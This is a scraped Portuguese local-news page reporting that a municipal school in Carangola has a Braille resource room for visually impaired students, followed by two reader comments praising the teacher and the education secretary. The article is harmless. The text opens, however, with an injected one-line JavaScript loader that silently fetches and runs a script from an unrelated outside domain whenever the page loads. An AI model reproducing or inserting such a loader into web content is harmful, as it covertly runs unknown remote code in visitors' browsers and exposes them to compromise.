;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Escola Municipal Santa Luzia tem sala recurso para deficientes visuais - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Escola Municipal Santa Luzia tem sala recurso para deficientes visuais

A Escola Municipal Santa Luzia, vem fazendo um belíssimo trabalho com os deficientes visuais, com o comando da professora Marilene Pereira Albuquerque.

Os alunos que estão estudando neste belíssimo projeto são:
Daiana Gomes, José Carlos Húngaro, Cosme José de Melo e Lidiane Melo de Oliveira.
A Escola Municipal Santa Luzia conta com uma máquina de datilografia Braille, um computador cedido pela Câmara Municipal e uma biblioteca Braille.
A Sala tem o objetivo de ajudar os alunos com o recurso em Braille para os cegos e a leitura para baixa visão, além da orientação e mobilidade.
A professora Marilene Pereira Albuquerque, fez um curso de 06 meses em Uberaba M.G, com o apoio do Governo Estadual. Adquirindo capacidade para orientar os alunos deste projeto.

Parabéns a Prefeitura de Carangola por essa iniciativa…..

Ofertas:

[secvitrine/livros/4785]

2 thoughts on “Escola Municipal Santa Luzia tem sala recurso para deficientes visuais

  1. Sala Recurso para deficientes visuais da Escola Municipal Santa Luzia –

    Parabenizo a todas as pessoas envolvidas neste projeto meritório., muito especialmente à professora Marilene Pereira Albuquerque que se esforçou no aprimoramento dos conhecimentos específicos desta área. Comovo-me com tamanha dedicação, pois conheço as dificuldades do ensino no Brasil.
    PRA FRENTE CARANGÓLA.

  2. Parabéns, também, para Glaciene Lyra, atual Secretária Municipal de Educação que foi a grande incentivadora desse projeto e deu todo o apoio necessário para que ele se tornasse realidade.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.